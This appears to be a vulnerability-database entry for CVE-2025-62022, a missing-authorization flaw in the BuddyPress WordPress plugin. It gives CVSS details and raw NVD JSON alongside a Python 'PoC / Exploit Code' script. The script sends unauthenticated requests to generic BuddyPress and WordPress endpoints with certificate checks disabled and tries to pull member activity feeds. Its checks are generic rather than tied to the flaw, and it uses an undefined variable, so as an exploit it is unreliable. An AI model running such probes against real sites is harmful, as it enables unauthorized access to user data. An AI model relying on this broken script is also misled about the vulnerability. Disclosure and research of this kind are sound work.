Security Vulnerability Report
中文
CVE-2025-62022 CVSS 7.5 HIGH

CVE-2025-62022

Published: 2025-10-22 15:16:04
Last Modified: 2026-04-28 22:16:19

Description

Missing Authorization vulnerability in BuddyPress BuddyPress buddypress.This issue affects BuddyPress: from n/a through <= 14.3.4.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

BuddyPress Plugin <= 14.3.4 (所有版本)
WordPress (受影响的BuddyPress运行版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-62022 PoC - Missing Authorization in BuddyPress Plugin # Target: WordPress site with BuddyPress plugin <= 14.3.4 target_url = "http://target-wordpress-site.com" # PoC 1: Attempt to access protected BuddyPress endpoints without authentication endpoints = [ "/wp-json/buddypress/v1/", "/?rest_route=/buddypress/v1/members/me", "/wp-admin/admin-ajax.php", "/?bp_form=1", ] print("[*] Testing CVE-2025-62022 - Missing Authorization in BuddyPress") print(f"[*] Target: {target_url}") print("-" * 60) for endpoint in endpoints: url = target_url + endpoint try: response = requests.get(url, timeout=10, verify=False) print(f"\n[?] Endpoint: {endpoint}") print(f"[+] Status Code: {response.status_code}") if response.status_code == 200: print(f"[!] VULNERABLE - Endpoint accessible without auth") print(f"[+] Response Preview: {response.text[:500]}") elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected - Authentication required") else: print(f"[?] Unexpected status code") except requests.exceptions.RequestException as e: print(f"[!] Error accessing {endpoint}: {e}") # PoC 2: Try to access member data without being logged in print("\n[*] Attempting to access member activity data...") member_activity_url = f"{target_url}/members/{username}/activity/feed" response = requests.get(member_activity_url, timeout=10) if response.status_code == 200: print(f"[!] VULNERABLE - Member activity feed accessible")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62022", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:16:03.547", "lastModified": "2026-04-28T22:16:19.393", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in BuddyPress BuddyPress buddypress.This issue affects BuddyPress: from n/a through <= 14.3.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/buddypress/vulnerability/wordpress-buddypress-plugin-14-3-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}